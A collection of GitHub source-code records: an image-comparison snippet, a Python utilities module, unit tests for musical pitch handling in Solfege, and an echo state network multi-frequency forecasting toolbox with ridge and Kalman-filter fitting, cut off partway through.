compare_images()\nimage = ImageComparison()\nimage.compare_images(\"D:\\\\Automation\\\\python\\\\pythonframework_v2\\\\project\\\\TestScreenshots\\\\LoginTestScenario\\\\loginWithProblemUser\\\\LoginPage\\\\navigateLoginPage.png\",\n\"D:\\\\Automation\\\\python\\\\pythonframework_v2\\\\project\\\\TestScreenshots\\\\LoginTestScenario\\\\loginWithProblemUser\\\\WelcomePage\\\\baseline_navigateWelcomePage.png\",\n\"D:\\\\Automation\\\\python\\\\pythonframework_v2\\\\project\\\\TestScreenshots\\\\differenceLogin.png\")","repo_name":"skbaithadiya/pythonframework_v2","sub_path":"framework/Utils/ImageCompare/ImageComparison.py","file_name":"ImageComparison.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"463703592","text":"import os\nimport time\n\nfrom datetime import datetime\nfrom multiprocessing import Process\n\n\ndef timer(start=None, to_var=False):\n if not start:\n print(datetime.now().ctime())\n return time.time()\n stop = time.time()\n m, s = divmod(stop - start, 60)\n h, m = divmod(m, 60)\n if to_var:\n return '{}:{}:{}'.format(int(h), int(m), round(s))\n print('total time {}:{}:{}'.format(int(h), int(m), round(s)))\n\n\ndef format_ratings_file(filename, delim, train=True):\n list_filename = filename.split(\"/\")\n path, old_filename = '/'.join(list_filename[:-1]), list_filename[-1]\n new_filename = \"train_\" if train else \"test_\"\n new_filename += old_filename.split(\".\")[0] + \".csv\"\n new_filename = path + \"/\" + new_filename\n os.system(\n (\"sed 's/{old_delim}/,/g' {filename} > {new_filename}\"\n ).format(\n old_delim=delim,\n filename=filename,\n new_filename=new_filename\n )\n )\n with open(new_filename, 'r') as original:\n data = original.read()\n with open(new_filename, 'w') as modified:\n modified.write(\"user,item,rating\\n\" + data)\n\n\nclass BaseMultiprocessing(object):\n def __init__(self, max_active_processes=10):\n \"\"\"Init.\"\"\"\n self.active_process_list = []\n self.max_active_processes = max_active_processes\n self.current_active_processes = 0\n\n def new_process(self, func, **kwargs):\n \"\"\"Spawn new process.\"\"\"\n p = Process(target=func, kwargs=kwargs)\n p.start()\n self.active_process_list.append(p)\n self.current_active_processes += 1\n\n def synchronize(self):\n \"\"\"Wait for all the alive process to terminate.\"\"\"\n for process in self.active_process_list:\n process.join()\n self.active_process_list = []\n self.current_active_processes = 0\n","repo_name":"tseste/nbcf","sub_path":"nbcf/_utilities.py","file_name":"_utilities.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8257844096","text":"import gettext\nimport unittest\nimport doctest\n\nimport solfege.mpd.musicalpitch\nfrom solfege.mpd.musicalpitch import MusicalPitch\nfrom solfege.mpd.interval import Interval\n\nclass TestMusicalPitch(unittest.TestCase):\n def test_normalize_double_accidental(self):\n for a, b in ((\"c\", \"c\"),\n (\"cisis\", \"d\"),\n (\"disis\", \"e\"),\n (\"eisis\", \"fis\"),\n (\"fisis\", \"g\"),\n (\"gisis\", \"a\"),\n (\"aisis\", \"b\"),\n (\"bisis\", \"cis'\"),\n (\"ceses\", \"bes,\"),\n (\"deses\", \"c\"),\n (\"eses\", \"d\"),\n (\"feses\", \"ees\"),\n (\"geses\", \"f\"),\n (\"ases\", \"g\"),\n (\"beses\", \"a\"),\n ):\n n = MusicalPitch.new_from_notename(a)\n n.normalize_double_accidental()\n self.assertEquals(n.get_octave_notename(), b)\n def test_add(self):\n n = MusicalPitch.new_from_notename('c')\n n = n + 2\n self.assertEquals(n.get_octave_notename(), 'd')\n def test_subtract(self):\n a = MusicalPitch.new_from_notename(\"g\")\n b = MusicalPitch.new_from_notename(\"f\")\n self.assertEquals(a - b, 2)\n def test_add_integer_fail(self):\n n = MusicalPitch.new_from_int(120)\n self.assertRaises(ValueError, lambda: n + 20)\n def test_add_interval_fail(self):\n n = MusicalPitch.new_from_int(120)\n i = Interval(\"M10\")\n self.assertRaises(ValueError, lambda: n + i)\n def test_internals(self):\n a = MusicalPitch()\n self.assertTrue(a.m_octave_i == a.m_accidental_i == 0)\n def test_trans(self):\n gettext.translation('solfege', './share/locale/', languages=['nb_NO']).install()\n n = MusicalPitch.new_from_notename(\"b,,\")\n self.assertEquals(n.get_octave_notename(), \"b,,\")\n self.assertEquals(n.get_user_octave_notename(), \"<sub>1</sub>H\")\n self.assertEquals(n.get_user_notename(), \"h\")\n def test_pitch_class(self):\n for n, i in ((\"c\", 0), (\"cis\", 1), (\"g\", 7), (\"ges\", 6), (\"gisis\", 9),\n (\"b\", 11), (\"bis\", 0), (\"bisis\", 1), (\"ces\", 11)):\n p = MusicalPitch.new_from_notename(n)\n self.assertEquals(p.pitch_class(), i)\n\nsuite = unittest.makeSuite(TestMusicalPitch)\nsuite.addTest(doctest.DocTestSuite(solfege.mpd.musicalpitch))\n","repo_name":"rannyeribaptist/Solfege","sub_path":"solfege/mpd/tests/test_musicalpitch.py","file_name":"test_musicalpitch.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"73866592802","text":"#\n# newToolbox_ESN_Multi\n#\n# Multi-frequency ESN updated toolbox\n#\n# Current version: January 2022\n# ================================================================\n\nfrom math import floor, ceil, inf\n#import datetime as dt\nimport pandas as pd\nimport numpy as np\n#from numpy import random\nimport re\nimport matplotlib.pyplot as plt\nfrom scipy.linalg import block_diag\nfrom scipy.stats import multivariate_normal\nfrom scipy.optimize import minimize as scipy_minimize\nfrom scipy.optimize import shgo, dual_annealing, basinhopping\nfrom scipy.special import kl_div\nfrom sklearn.model_selection import TimeSeriesSplit\nfrom sklearn.decomposition import PCA\nfrom pymoo.algorithms.soo.nonconvex.pattern import PatternSearch\nfrom pymoo.algorithms.soo.nonconvex.pso import PSO\nfrom pymoo.algorithms.moo.nsga2 import NSGA2\nfrom pymoo.algorithms.soo.nonconvex.nelder import NelderMead\nfrom pymoo.problems.functional import FunctionalProblem\nfrom pymoo.optimize import minimize as pymoo_minimize\nfrom pymoo.factory import get_termination\n#from pymoo.util.termination.x_tol import DesignSpaceToleranceTermination\n\nfrom newToolbox_ESN import ESN\nfrom newToolbox_ESN import matrh, vech\nfrom newToolbox_ESN import esn_data_to_nparray, ls_ridge, jack_ridge, r_ls\n\n# ----------------------------------------------------------------\n# Preamble\n\ndef closest_past_date(list_date, base_date, cutoff=0):\n \"\"\"\n list_date: collections of dates to compare.\n base_date: reference date to compate to for closest match.\n \"\"\"\n #return min([i for i in list_date if i <= base_date], key=lambda x: abs(x - base_date)), 0\n try:\n d_min = min([i for i in list_date[cutoff:] if i <= base_date], key=lambda x: abs(x - base_date))\n except ValueError:\n print(f\"Error at: {base_date} with cutoff: {cutoff}\")\n raise ValueError\n return d_min, list_date.get_loc(d_min)\n \n\ndef closest_future_date(list_date, base_date, cutoff=None):\n #return min([i for i in list_date if i >= base_date], key=lambda x: abs(x - base_date)), 0\n try:\n d_min = min([i for i in list_date[:cutoff] if i >= base_date], key=lambda x: abs(x - base_date))\n except ValueError:\n print(f\"Error at: {base_date} with cutoff: {cutoff}\")\n raise ValueError\n return d_min, list_date.get_loc(d_min)\n\ndef infer_periods(freq, periods=10**4, scale=100):\n \"\"\"\n freq : str pandas frequency alias.\n periods : numeric, given freq, should create many years. \n scale: scale of years to group by (century = 100).\n \"\"\"\n \n while True:\n try:\n s = pd.Series(data=pd.date_range('1970-01-01', freq=freq, periods=periods))\n break\n # If periods is too large\n except (pd.errors.OutOfBoundsDatetime, OverflowError, ValueError): \n periods = periods/10\n \n return s.groupby(s.dt.year // scale * scale).size().value_counts().index[0]\n\ndef compare_pandas_freq(f1, f2):\n p1 = infer_periods(f1)\n p2 = infer_periods(f2)\n return (f1 if p1 > p2 else f2)\n\ndef _scalpel_loss(t, c=1.0):\n return abs(t) if abs(t) <= abs(c) else t**2 / abs(c)\nscalpel_loss = np.vectorize(_scalpel_loss, excluded=['c'])\n\ndef _hammer_loss(t, c=1.0):\n return 0 if abs(t) <= abs(c) else (abs(t) - abs(c))**2\nhammer_loss = np.vectorize(_hammer_loss, excluded=['c'])\n\n#class ShortTimeSeriesSplit:\n# def __init__(self, split_size=1, n_splits=None):\n# assert split_size > 0\n# self.split_size_ = split_size\n# self.n_splits_ = n_splits\n#\n# def split(self, data):\n# assert isinstance(data, pd.DataFrame) or isinstance(data, pd.Series)\n#\n# T = len(data)\n# # NOTE: if 'test_size' was set to None, use the last 10% \n# # of data as testing splits\n# n_splits = self.n_splits_ if (self.n_splits_ > 1) else max((T // 10) // self.split_size_, 1)\n# split_size = self.split_size_\n# min_train_size = T - n_splits * split_size\n#\n# train_idxs = []\n# test_idxs = []\n# for i in range(n_splits):\n# t_i = min_train_size + i * split_size\n# train_idxs.append(tuple(range(0, t_i)))\n# test_idxs.append(tuple(range(t_i, t_i + split_size)))\n#\n# return tuple(zip(train_idxs, test_idxs))\n\nclass ShiftTimeSeriesSplit:\n def __init__(self, min_split_size, test_size=1, max_split_size=None):\n assert min_split_size > 0\n if not max_split_size is None:\n assert max_split_size > 0, \"Maximum split size must be positive\"\n assert max_split_size >= min_split_size, \"Maximum split size must be greater or equal to minimum split size\"\n\n self.min_split_size_ = min_split_size\n self.test_size_ = test_size\n self.max_split_size_ = max_split_size\n \n def split(self, data):\n #assert isinstance(data, pd.DataFrame) or isinstance(data, pd.Series)\n\n flag_mss = False\n if not self.max_split_size_ is None:\n flag_mss = True\n\n T = len(data)\n # Compute number of splits\n n_splits = T - self.min_split_size_ - self.test_size_ + 1\n\n train_idxs = []\n test_idxs = []\n t_i = self.min_split_size_\n for i in range(n_splits):\n start_idx = max(0, t_i - self.max_split_size_) if flag_mss else 0\n train_idxs.append(list(range(start_idx, t_i)))\n test_idxs.append(list(range(t_i, t_i + self.test_size_)))\n t_i += 1\n\n return tuple(zip(train_idxs, test_idxs))\n\n# ----------------------------------------------------------------\n# ESN Multi-Frequency Class\n#\n\nclass ESNMultiFrequency:\n def __init__(self, models, ar=False, states_join='align', states_lags=None):\n self.models_ = tuple(models)\n self.ar_ = (ar is True)\n self.states_join_ = states_join\n self.states_lags_ = states_lags\n\n # Checks\n for m in self.models_:\n assert isinstance(m, ESN), 'All models must be ESN models'\n\n assert self.states_join_ in ('align', 'lag_stack'), \"State joining specification must be one of: 'align', 'lag_stack'\"\n\n if not self.states_lags_ is None:\n assert len(self.states_lags_) == len(self.models_), 'State lags specification must be of same length as models'\n for l in self.states_lags_:\n assert type(l) is int and l >= 0, 'State lags must be integers and non-negative'\n\n # Inherited properties\n models_N = []\n for m in self.models_:\n models_N.append(m.N_)\n self.models_N_ = models_N\n self.M_ = sum(models_N)\n if not self.states_lags_ is None:\n self.states_N_ = [int(n * (1 + l)) for n, l in zip(self.models_N_, self.states_lags_)]\n else:\n self.states_N_ = self.models_N_\n\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # \n def prep_data(self, Y, z):\n Y_dates = Y.index\n Y_ = esn_data_to_nparray(Y)\n if Y_ is None:\n raise TypeError(\"Type of Y not recognized, need pandas.DataFrame or numpy.ndarray\")\n assert isinstance(Y_dates, pd.DatetimeIndex)\n \n z_dates = []\n z_ = [] \n #assert len(z) > 0\n if len(z) > 0:\n for zj in z:\n zj_dates = zj.index\n zj_ = esn_data_to_nparray(zj)\n if zj_ is None:\n raise TypeError(\"Type of z not recognized, need pandas.DataFrame or numpy.ndarray\")\n assert isinstance(zj_dates, pd.DatetimeIndex)\n\n z_dates.append(zj_dates)\n z_.append(zj_)\n # Make immutable\n z_dates = tuple(z_dates)\n z_ = tuple(z_)\n\n return Y_, Y_dates, z_, z_dates\n\n def multifreq_states(self, Y, z, init, washout_len, Y_dates=None, z_dates=None):\n # States\n X = []\n \n # Y states [if autoregressive]\n #X0 = self.models_[0].base_generate_states(\n # z=Y, init=init[0], washout_len=washout_len\n #)\n #X0 = pd.DataFrame(X0, index=Y_dates)\n #X.append(X0)\n\n # z states\n Z = (Y, ) + z if self.ar_ else z\n dates = (Y_dates, ) + z_dates if self.ar_ else z_dates\n for j, zj_ in enumerate(Z):\n Xj = self.models_[j].base_generate_states(\n z=zj_, init=init[j], washout_len=washout_len\n )\n # Add dates to states\n Xj = pd.DataFrame(\n Xj, \n #columns=tuple(map(lambda x : 'C'+str(x), range(Xj.shape[1]))),\n index=dates[j][washout_len:],\n )\n #\n X.append(Xj)\n\n return X\n\n def multifreq_states_to_matrix(self, ref_dates, states, lags=None):\n # Multifrequency state matrix\n X_multi = None\n\n if self.states_join_ == 'align':\n # High-frequency states are aligned, i.e. for each frequency\n # only the closest past / contemporary state to the low-freuency \n # target is used as regressor.\n X_multi = np.full((len(ref_dates), self.M_), np.nan)\n\n p = 0\n for j, Xj in enumerate(states):\n #if j == 0:\n # X_multi[:,0:self.models_N_[0]] = np.squeeze(Xj)\n #else:\n # for t, lf_date_t in enumerate(ref_dates):\n # cpd, _ = closest_past_date(states_dates[j-1], lf_date_t)\n # X_multi[t,p:(p+self.models_N_[j])] = np.squeeze(Xj.loc[cpd])\n\n kt = 0\n for t, lf_date_t in enumerate(ref_dates):\n #cpd, _ = closest_past_date(states_dates[j-1], lf_date_t)\n cpd, kt = closest_past_date(Xj.index, lf_date_t, cutoff=kt)\n X_multi[t,p:(p+self.models_N_[j])] = np.squeeze(Xj.loc[cpd])\n #\n p += self.models_N_[j]\n\n elif self.states_join_ == 'lag_stack':\n # High-frequency states are stacked with lags, i.e. for each frequency\n # the closest past / contemporary state to the low-freuency \n # target + lagged states are used together as regressors.\n if lags is None:\n lags = np.array(self.states_lags_).astype(int)\n else:\n assert len(lags) == len(self.models_), \"State stacking: lags specification not of same length as models\"\n for l in lags:\n assert type(l) is int and l >= 0, 'State lags must be integers and non-negative'\n\n X_multi = np.full((len(ref_dates), int(sum(self.models_N_ * (1 + lags)))), np.nan)\n\n p = 0\n for j, Xj in enumerate(states):\n kt = 0\n for t, lf_date_t in enumerate(ref_dates):\n cpd, kt = closest_past_date(Xj.index, lf_date_t, cutoff=kt)\n X_multi[t,p:(p+self.models_N_[j])] = np.squeeze(Xj.loc[cpd])\n # Lags\n q = p + self.models_N_[j]\n for l in range(lags[j]):\n cpd_lag = Xj.index[kt-l-1]\n X_multi[t,q:(q+self.models_N_[j])] = np.squeeze(Xj.loc[cpd_lag])\n q += self.models_N_[j]\n #\n p += q # = self.models_N_[j] * int(1 + lags[j])\n\n else:\n raise ValueError(\"Multifrequency state joining method not defined\")\n\n return X_multi\n \n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # ESN Multi-Frequency Fitting\n\n def fit(self, Y, z, steps=1, method='ridge', Lambda=0, full=True, Lambda_comps=None, options='',\n init=None, washout_len=0, debug=True):\n # Flatter data and extract datetime indexes\n Y_, Y_dates, z_, z_dates = self.prep_data(Y, z)\n\n # Check model number vs data\n assert len(self.models_) == int(self.ar_) + len(z), \"Number of ESN models does not correspond to number of data series\"\n\n # Decompose options strings\n method_name = re.findall(\"^\\w+(?=-)?\", method)\n method_opts = re.findall(\"(?<=-)\\w+(?=:)?\", method)\n method_nums = re.findall(\"(?<=:)(\\d+(?:\\.\\d+)?)\", method)\n\n method = method_name[0]\n\n if debug:\n print(\". Method:\")\n print(method_name)\n print(method_opts)\n print(method_nums)\n\n opts_opts = re.findall(\"(?<=-)\\w+(?=:)?\", options)\n opts_nums = re.findall(\"(?<=:)(\\d+(?:\\.\\d+)?)\", options)\n\n if debug:\n print(\". Options:\")\n print(opts_opts)\n print(opts_nums)\n \n # States\n init = [None for _ in range(int(self.ar_) + len(z))] if init is None else init\n assert len(init) == len(self.models_), \"Length of initialization 'init' must be equal to the number of ESN models\"\n \n X = self.multifreq_states(\n Y=Y_, z=z_, Y_dates=Y_dates, z_dates=z_dates,\n init=init, washout_len=0,\n )\n\n # States matrix\n X_multi = self.multifreq_states_to_matrix(\n ref_dates=Y_dates, states=X,\n )\n\n # OPTIONAL: reduce state dimensionalty using PCA\n pca = None\n if 'pca' in method_opts:\n pca_factor = float(method_nums[method_opts.index('pca')])\n assert pca_factor > 0\n if pca_factor > 1:\n pca_factor = int(pca_factor)\n\n # PCA\n pca = PCA(n_components=pca_factor)\n X_multi = pca.fit_transform(X_multi)\n # NOTE: below is the \"wrong\" time-dimension \"PCA\"\n #X_multi = pca.fit(X_multi.T).components_.T\n\n if debug: print(f\". PCA: states space size reduced to N = {pca.n_components_}\")\n\n if not method in (None, 'none', 'least_squares', 'r_ls'):\n Lambda_ = np.atleast_1d(np.array(Lambda))\n if pca is None:\n assert len(Lambda_) == len(self.models_), \"Lambda is not scalar, must have same length as number of models\"\n d = np.zeros(sum(self.states_N_))\n i = 0\n for n, k in enumerate(self.states_N_):\n d[i:(i+k)] = Lambda[n] * np.ones(k)\n i += k\n Lambda_ = np.diagflat(d)\n else:\n if not len(Lambda_) == 1:\n print(\"PCA requires scalar ridge penalty, selecting only first component of 'Lambda'\")\n Lambda_ = Lambda_[0]\n\n # Fit\n assert steps > 0\n\n W = []\n for s in range(steps):\n # Slice matrices\n Ys = Y_[(1+s):,]\n Xs = X_multi[0:(-1-s),]\n\n Ws = None\n if (method == 'none') or (method is None):\n Ws = np.ones((X.shape[1], 1)) \n elif method == 'least_squares':\n Ws = ls_ridge(Y=Ys, X=Xs, Lambda=0)\n elif method == 'ridge':\n Ws = ls_ridge(Y=Ys, X=Xs, Lambda=Lambda_)\n elif method == 'ridge_jackknife':\n Ws = jack_ridge(Y=Ys, X=Xs, Lambda=Lambda_)\n elif method == 'rls':\n min_train_size = 1\n if 'min_train_size' in opts_opts:\n min_train_size = int(opts_nums[opts_opts.index('min_train_size')])\n assert min_train_size >= 0\n V0 = np.hstack((np.ones((min_train_size, 1)), Xs[0:min_train_size,]))\n P0 = np.linalg.pinv(V0.T @ V0)\n W0 = ls_ridge(Y=Ys[0:min_train_size,], X=Xs[0:min_train_size,], Lambda=0)\n Ws, _ = r_ls(Y=Ys[min_train_size:,], X=Xs[min_train_size:,], W0=W0, P0=P0)\n Ws = [W0,] + Ws\n else:\n raise ValueError(\"Fitting method not defined\")\n\n W.append(Ws)\n\n # OPTIONAL: Fit full individual autoregressive models \n # (Necessary for multi-step forecasting)\n W_comps_ar = []\n if full:\n if Lambda_comps is None:\n Lambda_comps = Lambda\n\n for j, Xj in enumerate(X):\n if self.ar_:\n Ys_j = Y_[1:,] if j == 0 else z_[j-1][1:,]\n else:\n Ys_j = z_[j][1:,]\n Xs_j = Xj.iloc[0:-1,].to_numpy()\n # Fit individual weights\n if (method == 'none') or (method is None):\n W_comps_ar.append(np.ones((Xs_j.shape[1], 1)))\n elif method == 'least_squares':\n W_comps_ar.append(ls_ridge(Y=Ys_j, X=Xs_j, Lambda=0))\n elif method == 'ridge':\n W_comps_ar.append(ls_ridge(Y=Ys_j, X=Xs_j, Lambda=Lambda_comps[j]))\n else:\n raise ValueError(\"Fitting method not defined\")\n #\n #if method == 'ridge':\n # eps = 1.3\n # fac = 1\n # max_eig = np.Inf\n # l = 0\n # while max_eig > 1.2 and l <= 1e5:\n # fac *= eps\n # W_j = ls_ridge(Y=Ys_j, X=Xs_j, Lambda=(Lambda[j] * fac))\n # max_eig = np.max(np.abs(np.linalg.eig(\n # self.models_[j].A_ + self.models_[j].C_ @ W_j[1:,].T\n # )[0]))\n # l += 1\n # W_comps_ar.append(W_j)\n\n\n # Fit objects\n esnmulti_fit_for = []\n for s in range(steps):\n # Slice matrices\n X_s = X_multi[0:(-1-s),]\n V_fit_s = np.hstack((np.ones((X_s.shape[0], 1)), X_s))\n\n # Compute fits\n if method in ('least_squares', 'ridge', 'ridge_jackknife'):\n Y_fit_s = pd.DataFrame(data=V_fit_s @ W[s], index=Y_dates[(1+s):])\n elif method == 'rls':\n Y_fit_r_ls_s = np.zeros(Y_[(1+s):,].shape)\n for t in range(len(Y_fit_r_ls_s)):\n if t < min_train_size:\n Y_fit_r_ls_s[t,] = V_fit_s[t,] @ Ws[0]\n else:\n Y_fit_r_ls_s[t,] = V_fit_s[t,] @ Ws[t-min_train_size]\n Y_fit_s = pd.DataFrame(data=Y_fit_r_ls_s, index=Y_dates[(1+s):])\n \n Y_s = pd.DataFrame(data=Y_[(1+s):,], index=Y_dates[(1+s):])\n Residuals_s = Y_s - Y_fit_s\n RSS_s = np.sum(Residuals_s.to_numpy() ** 2)\n\n esnmulti_fit_for.append({\n 's': s+1,\n 'W': W[s],\n 'Y_fit': Y_fit_s,\n 'Residuals': Residuals_s,\n 'RSS': RSS_s,\n 'Y': Y_s,\n 'V': V_fit_s,\n 'X': X_s,\n })\n\n # Output\n fit_out = {\n 'model': 'ESNMultiFrequency',\n 'fit_for': esnmulti_fit_for,\n 'fit_comp_ar': W_comps_ar,\n 'steps': steps,\n 'dates': Y_dates,\n 'models': len(self.models_),\n 'model_N': self.models_N_,\n 'method': method,\n 'Lambda': Lambda,\n 'init': init,\n 'state_tuple': X,\n 'pca': pca,\n #'end_state': X_multi[-1,],\n 'washout_len': washout_len,\n }\n\n return fit_out\n\n def fitKF(self, Y, z, steps=1, method='EKF_ridge', Lambda=0, \n init=None, washout_len=0, full=True, options='', debug=True):\n # Flatter data and extract datetime indexes\n Y_, Y_dates, z_, z_dates = self.prep_data(Y, z)\n\n # NOTE: for now this code should ONLY be used for 1-step-ahead forecast with no lags\n #assert len(self.models_) == 1\n assert steps == 1\n assert self.states_lags_ is None\n\n # Check model number vs data\n assert len(self.models_) == int(self.ar_) + len(z), \"Number of ESN models does not correspond to number of data series\"\n\n # Decompose options strings\n method_name = re.findall(\"^\\w+(?=-)?\", method)\n method_opts = re.findall(\"(?<=-)\\w+(?=:)?\", method)\n method_nums = re.findall(\"(?<=:)(\\d+(?:\\.\\d+)?)\", method)\n\n kf_method = method_name[0]\n\n if debug:\n print(\". Method:\")\n print(method_name)\n print(method_opts)\n print(method_nums)\n \n # States\n init = [None for _ in range(int(self.ar_) + len(z))] if init is None else init\n assert len(init) == len(self.models_), \"Length of initialization 'init' must be equal to the number of ESN models\"\n\n # NOTE: we compute 'preliminary' states to create alignment\n # indexes that can be re-used in the optimization loop\n # (direct date comparison are too expensive)\n if debug: print(\". Building states date indexes\")\n\n pre_X = self.multifreq_states(\n Y=Y_, z=z_, Y_dates=Y_dates, z_dates=z_dates,\n init=init, washout_len=0,\n )\n\n # States matrix\n pre_X_multi = self.multifreq_states_to_matrix(\n ref_dates=Y_dates, states=pre_X,\n )\n\n # States indexes\n X_multi_idx = []\n for j, Xj in enumerate(pre_X):\n if not self.states_lags_ is None:\n idx_j = np.full((1+self.states_lags_[j], len(Y_dates)), np.nan)\n else:\n idx_j = np.full((1, len(Y_dates)), np.nan)\n kt = 0\n for t, lf_date_t in enumerate(Y_dates):\n _, kt = closest_past_date(Xj.index, lf_date_t, cutoff=kt)\n idx_j[0,t] = kt \n if not self.states_lags_ is None:\n for l in range(self.states_lags_[j]):\n idx_j[1+l,t] = kt-1\n X_multi_idx.append(idx_j.astype(int))\n\n # Weight estimation method\n if kf_method == 'EKF_ridge':\n Lambda_ = None\n if not np.isscalar(Lambda):\n assert len(Lambda) == len(self.models_), \"Lambda is not scalar, must have same length as number of models\"\n d = np.zeros(sum(self.states_N_))\n i = 0\n for n, k in enumerate(self.states_N_):\n d[i:(i+k)] = Lambda[n] * np.ones(k)\n i += k\n Lambda_ = np.diagflat(d)\n else:\n Lambda_ = Lambda\n Wfun = lambda Y, X : ls_ridge(Y=Y, X=X, Lambda=Lambda_)\n else:\n raise ValueError(\"Fitting method not defined\")\n\n # Pre-weights\n Ys1 = Y_[1:,]\n Xs1 = pre_X_multi[0:-1,]\n pre_W = np.atleast_2d(Wfun(Y=Ys1, X=Xs1))\n\n # MF-EKF log-likelihood\n Z = (Y_, ) + z_ if self.ar_ else z_\n\n Ny = Y_.shape[1]\n Nz = [zj_.shape[1] for zj_ in Z]\n T = len(Y_dates)\n\n # Init\n m0 = [model.zeta_ for model in self.models_]\n P0 = [1e-2 * np.eye(Nj) for Nj in self.models_N_]\n\n W_a = pre_W[0,:]\n W_w = pre_W[1:,:]\n\n def MF_EKF_diag_logLike(parsEKF):\n j = 0\n p_Sigma_eps = []\n for i, Nz_j in enumerate(Nz):\n #p_Sigma_eps_j = parsEKF[j:(j + Nz_j)]\n p_Sigma_eps_j = np.hstack((np.ones(1), parsEKF[j:(j + Nz_j - 1)]))\n p_Sigma_eps.append(p_Sigma_eps_j)\n j += Nz_j - 1\n p_Sigma_eta = parsEKF[j:(j + Ny)]\n\n #p_Sigma_eps = []\n #for j, Nz_j in enumerate(Nz):\n # p_Sigma_eps_j = parsEKF[j] * np.ones(Nz_j)\n # p_Sigma_eps.append(p_Sigma_eps_j)\n #p_Sigma_eta = parsEKF[-1] * np.ones(Ny)\n\n # ESN model parameter aliases\n rho_ = [model.rho_ for model in self.models_]\n A_ = [model.A_ for model in self.models_]\n gamma_ = [model.gamma_ for model in self.models_]\n C_ = [model.C_ for model in self.models_]\n zeta_ = [model.zeta_ for model in self.models_]\n leak_rate_ = [model.leak_rate_ for model in self.models_]\n\n # Multi-Frequency Extended Kalman Filter\n X_prd = np.zeros((self.M_, T-1))\n X_flt = np.zeros((self.M_, T-1))\n L_l_t = np.zeros(T)\n LogLike = 0\n\n # Prediction variables\n M0_t = []\n P0_t = P0.copy()\n\n # Update variables\n P_t = P0.copy()\n M_t = m0.copy()\n\n # NOTE: for now, implement only the 'canonical' linearization\n sl = [0 for _ in range(len(Z))]\n # For each low-frequency period (t-index) from 0 to T-1\n for t in range(T-1):\n m0_t = np.full((self.M_, 1), np.nan)\n # For each reservoir component...\n p = 0\n for j, zj_ in enumerate(Z):\n # Prediction: iterate state equations forwards at own freqency (s index)\n m0_s = M_t[j]\n for s in range(sl[j], X_multi_idx[j][0][t]+1):\n u0_s = (rho_[j] * A_[j]) @ m0_s + (gamma_[j] * C_[j]) @ zj_[[s],:].T + zeta_[j]\n m0_s = leak_rate_[j] * m0_s + (1 - leak_rate_[j]) * np.tanh(u0_s)\n D_u0_t = 1 - (np.tanh(u0_s) ** 2)\n F_x = leak_rate_[j] * np.eye(self.models_N_[j]) + (1 - leak_rate_[j]) * D_u0_t * rho_[j] * A_[j]\n F_q = (1 - leak_rate_[j]) * D_u0_t * gamma_[j] * C_[j]\n P0_s = F_x @ P_t[j] @ F_x.T + F_q @ np.diagflat(p_Sigma_eps[j]) @ F_q.T\n P0_s = (P0_s + P0_s.T) / 2\n m0_t[p:(p+self.models_N_[j]),] = m0_s\n P0_t[j] = P0_s\n p += self.models_N_[j]\n # Move s index forward\n sl[j] = X_multi_idx[j][0][t]\n # Update: use only last prediction step (s=0 for all j)\n v_t = Ys1[[t],:].T - (W_w.T @ m0_t + W_a[:,None])\n S_t = W_w.T @ block_diag(*P0_t) @ W_w + np.diagflat(p_Sigma_eta)\n K_t = block_diag(*P0_t) @ W_w @ np.linalg.inv(S_t)\n m_u_t = m0_t + K_t @ v_t\n P_u_t = block_diag(*P0_t) - K_t @ S_t @ K_t.T\n P_u_t = (P_u_t + P_u_t.T) / 2\n #if np.linalg.norm(P_u_t, ord=np.inf) <= 1e-11:\n # P_u_t = 1e-12 * np.eye(self.M_)\n # Slice updates to individual reservoirs\n p = 0\n for j in range(len(Z)):\n M_t[j] = m_u_t[p:(p+self.models_N_[j]),]\n P_t[j] = P_u_t[p:(p+self.models_N_[j]),p:(p+self.models_N_[j])]\n p += self.models_N_[j]\n # Save states\n X_prd[:,t] = np.squeeze(m0_t)\n X_flt[:,t] = np.squeeze(m_u_t)\n\n #print(np.linalg.svd((S_t))[1])\n\n # Compute log-likelihood\n L_l_t[t] = multivariate_normal.pdf(\n np.squeeze(Ys1[[t],:]), \n mean=np.squeeze(W_w.T @ m0_t + W_a[:,None]), cov=S_t\n )\n #\n LogLike = np.sum(np.log(L_l_t[washout_len:] + 1e-12))\n\n return (-LogLike, X_prd, X_flt, M_t, P_t)\n\n # Starting values\n #x0 = np.hstack([1e-2 * vech(np.eye(Nj)) for Nj in self.models_N_] + [1e-2 * vech(np.eye(Ny)),])\n #xl = np.hstack([-1e1 * np.ones(Nj*(Nj+1)//2) for Nj in self.models_N_] + [-1e1 * np.ones(Ny*(Ny+1)//2),])\n #xu = np.hstack([+1e1 * np.ones(Nj*(Nj+1)//2) for Nj in self.models_N_] + [+1e1 * np.ones(Ny*(Ny+1)//2),])\n\n x0 = 1e-2 * np.ones(sum(Nz)-1 + Ny)\n xl = 1e-12 * np.ones(sum(Nz)-1 + Ny)\n xu = 1e2 * np.ones(sum(Nz)-1 + Ny)\n\n #x0 = 1e-2 * np.ones(len(Nz) + 1)\n #xl = 1e-18 * np.ones(len(Nz) + 1)\n #xu = 1e2 * np.ones(len(Nz) + 1)\n\n print(MF_EKF_diag_logLike(x0)[0])\n \n # Optimize for [Sigma_eps], Sigma_eta (given W)\n opt_res = pymoo_minimize(\n FunctionalProblem(\n len(x0),\n lambda x : MF_EKF_diag_logLike(x)[0],\n x0=x0, xl=xl, xu=xu,\n ), \n PatternSearch(), \n get_termination(\"n_eval\", 1000), \n #get_termination(\"time\", \"00:15:00\"),\n #get_termination(\"time\", \"00:00:05\"),\n verbose=True, \n seed=1203477\n ) \n res_X = opt_res.X\n\n #opt_res = scipy_minimize(\n # fun=lambda x : MF_EKF_diag_logLike(x)[0],\n # x0=x0,\n # bounds=tuple(zip(xl, xu)),\n # method='L-BFGS-B',\n # #method='trust-constr',\n # options={'disp': True, 'maxiter': 1, 'iprint': 1},\n #)\n #res_X = opt_res.x\n\n 